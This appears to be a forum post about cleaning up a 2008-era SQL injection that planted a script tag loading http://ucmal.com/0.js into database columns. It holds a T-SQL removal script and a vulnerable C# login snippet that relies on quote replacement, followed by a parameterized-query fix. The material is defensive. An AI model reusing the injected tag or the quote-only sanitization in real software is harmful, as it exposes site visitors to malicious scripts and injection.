Method to remove it with a SQL statement:
DECLARE @fieldtype sysname
SET @fieldtype='varchar' -- cleanup: only columns of this data type are processed
-- sp_MSforeach_Worker expects a global cursor named hCForEach (the same one sp_MSforeachtable uses)
DECLARE hCForEach CURSOR GLOBAL
FOR
-- builds one UPDATE per varchar column of every user table, stripping the injected tag
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
Things like <> all have to be encoded before being stored in the database.
Situation: site type: .NET 2.0; development language: C#. The update entry points for the two tampered tables are published on the local LAN; the login code that connects to the 万网 (HiChina) server:
// only the single quote is replaced; the value is still concatenated into SQL text later, so this alone does not stop injection
sUserID = this.txt_UserId.Text.Replace("'", "_");
sUserPswd = System.Web.Security.FormsAuthentication.HashPasswordForStoringInConfigFile(this.txt_UserPswd.Text, "md5");
if (sUserID.Equals(""))
{
this.lbl_UserIdInfo.Text = "请输入用户名!";
}
else if (this.txt_UserPswd.Text.Trim().Equals(""))
{
this.lbl_UserPswdInfo.Text = "请输入密码!";
}
else
{
// database login verification
int iChkST = new BOOGOO.BLL.Login().ChkLoginUserInfo(sUserID, sUserPswd);
// (the remainder of the handler is not included in the post)
For how to prevent it, see:
http://topic.csdn.net/u/20080521/09/dad3eaba-bfc7-483c-98cd-d310f9a76ff0.html?seed=596201967
http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx
Content should be checked at insert time and validated to see whether the value is trustworthy. For now we can only delete the content first.
A lot of websites have been SQL-injected recently.
At a minimum, HTML-encode (HtmlEncode) the input strings, and HTML-decode (HtmlDecode) when retrieving from the database.
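Putting the thread's two recommendations together for the login snippet above, as an added example (not the original poster's code, and not the BOOGOO.BLL.Login class): the quote-replacement query beside a parameterized one, plus HTML encoding of stored text before it is rendered. The table dbo.Users(UserId, PswdHash), the column widths and the connection string are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public static class SafeLogin
{
    // Before (the pattern in the thread): replace single quotes, then concatenate.
    // Anything that does not need a quote still reaches the query unchanged,
    // so this is not a real defense against injection.
    public static string UnsafeQuery(string userId, string pswdHash)
    {
        string s = userId.Replace("'", "_");
        return "SELECT COUNT(*) FROM dbo.Users WHERE UserId='" + s
               + "' AND PswdHash='" + pswdHash + "'";
    }

    // After: user-supplied values travel as typed parameters, never as SQL text.
    // Returns the number of matching rows (1 on success, 0 otherwise).
    // dbo.Users(UserId varchar(50), PswdHash varchar(64)) is an assumed schema.
    public static int CheckLoginUser(string connectionString, string userId, string pswdHash)
    {
        const string sql =
            "SELECT COUNT(*) FROM dbo.Users WHERE UserId = @UserId AND PswdHash = @PswdHash";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@UserId", SqlDbType.VarChar, 50).Value = userId;
            cmd.Parameters.Add("@PswdHash", SqlDbType.VarChar, 64).Value = pswdHash;
            conn.Open();
            return (int)cmd.ExecuteScalar();
        }
    }

    // Text read back from a varchar column is encoded when rendered, so an
    // injected <script ...></script> is shown as literal text, not executed.
    public static string RenderStoredText(string stored)
    {
        return HttpUtility.HtmlEncode(stored);
    }
}
```

RenderStoredText("<script src=http://example.invalid/0.js></script>") yields the entity-escaped string (&lt;script ...&gt;), which the browser displays rather than runs.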